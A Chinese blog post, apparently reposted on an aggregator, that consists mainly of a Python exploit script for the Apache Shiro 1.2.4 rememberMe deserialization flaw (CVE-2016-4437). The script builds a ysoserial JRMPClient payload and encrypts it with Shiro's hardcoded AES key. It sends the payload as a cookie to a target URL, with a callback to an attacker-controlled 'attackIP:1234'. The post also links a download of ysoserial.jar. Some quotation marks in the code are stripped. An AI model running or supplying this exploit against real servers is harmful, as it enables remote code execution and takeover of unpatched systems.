实战Apache Shiro 1.2.4 RCE

Posted peterpan0707007

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了实战Apache Shiro 1.2.4 RCE相关的知识,希望对你有一定的参考价值。

poc:

#coding: utf-8
import os
import re
import sys
import base64
import uuid
import subprocess
import requests
from Crypto.Cipher import AES

JAR_FILE = ysoserial.jar

def attack(target,command):
    if not os.path.exists(JAR_FILE):
        raise Exception(jar file not found!)
    popen = subprocess.Popen([java, -jar, JAR_FILE, JRMPClient, command],
                             stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    print(base64_ciphertext)
    try:
       response = requests.get(target, timeout=20, cookies={"rememberMe": base64_ciphertext.decode()})
       print (Request to target URL success)
    except Exception as e:
       print("[x] Request to target URL fail! {}".format(e))

if __name__ == __main__:
    url=sys.argv[1]
    attack(url, attackIP:1234)

需当前目录安装ysoserial.jar,链接:https://pan.baidu.com/s/1gdevU9QyguGSYr2ExBChqQ  密码:nsoi

实战截图:

技术图片

 

以上是关于实战Apache Shiro 1.2.4 RCE的主要内容,如果未能解决你的问题,请参考以下文章

Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)复现

Java--Apache Shiro反序列化RCE--CVE-2016-4437

Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现

Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现

Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)